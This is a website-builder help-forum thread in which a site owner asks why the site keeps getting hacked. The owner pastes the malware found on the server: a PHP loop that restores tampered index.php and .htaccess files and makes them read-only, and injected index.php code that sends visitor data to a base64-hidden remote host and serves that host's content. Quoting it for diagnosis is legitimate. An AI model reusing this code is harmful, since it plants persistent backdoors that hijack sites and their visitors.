WebSite X5Help Center

 
A. Pais
A. Pais
User

Hack website  en

Autore: A. Pais
Visite 386, Followers 1, Condiviso 0  
Parole Chiave: hack,website x5 evo 2024.4

desde há cerca de 4 meses, que tenho sido hackeado todas as semanas.
já tentei apaguei toda a pasta, e apaguei os ficheiros alterados, e sempre que faço o upload dos ficheiros limpos, , passado uns dias, acontece o mesmo.
Acho que existe uma vulneberilidade em algum ficheiro, onde o hacker consegue aceder ao espaço. podem ajudar se eu vos enviar os ficheiros para análise?
Estou frustrado e já retornei ao programa antigo (website x5 evo12), uma vez que este sempre foi seguro
Podem ajudar-me?

Postato il
10 RISPOSTE
Claudio D.
Claudio D.
Moderator
Utente del mese IT

what exactly do you mean by “hacked” ?


the only vulnerabilities might be in the php files if you use a deprecated version of php, but the chances are very low.


I think that :
- either you have extra code from a dubious source (counters, for example).
- or they have your ftp password.

Anyway , version 12 is more vulnerable.

Have you changed the ftp password yet ?
Do you have extra codes ?
Do you use ftps to transfer the site to the host ?

Explain well what you mean by “hacked”.



Leggi di più
Postato il da Claudio D.
Alvin L.
Alvin L.
User

Looks like you are using MyBB for your forums.  You might see if they have an upgrade.  Your hosting provider should offer the ability to block IP's.  Most likely the are coming from a short list of IP's.

Leggi di più
Postato il da Alvin L.
A. Pais
A. Pais
User
Autore

Yes, I use MyBB, but I thinks is not there. Yestarday I deactivated the Plugins, and is the same. every time i delete this 3 files, before sime time, they reapear, and my index, put witl ".old", like the print. I can share the files, they dont have virus, but someone can see what they mess.

Leggi di più
Postato il da A. Pais
Claudio D.
Claudio D.
Moderator
Utente del mese IT

have you reset and change ftp password ?

what version of MyBB ?

what version of php ?

Leggi di più
Postato il da Claudio D.
A. Pais
A. Pais
User
Autore

I reset the ftp pass , like 5 times.

My version of MyBB is the last 1.38.

php version I can see in cpanel 7.3 (current)

Leggi di più
Postato il da A. Pais
Alvin L.
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Leggi di più
Postato il da Alvin L.
A. Pais
A. Pais
User
Autore

I will consider in the nex update of MyBB, but I think is not from there.

This is the code appear;

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in new index.php

This is the change

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Leggi di più
Postato il da A. Pais
A. Pais
A. Pais
User
Autore

OK, I think I configure the problem.
I made a search in file I.php and get some results relating with facebook. I have a code and plugin in my index, so I removed. lets see if they appear again. Hope not ;)

Leggi di più
Postato il da A. Pais
Glaucio M.
Glaucio M.
User

Amigo, problema está em seu servidor. Se for conta única, pode ter tido o FTP invadido e infiltrado algum código maligno. Maioria das vezes é invadido por ser uma hospedagem compartilhada! Cobre sua empresa responsável pela hospedagem! 

Leggi di più
Postato il da Glaucio M.
A. Pais
A. Pais
User
Autore

The problem is not the facebook plugin. I will try make a fresh MyBB install and see if the problem maintain.

I will give news.

Leggi di più
Postato il da A. Pais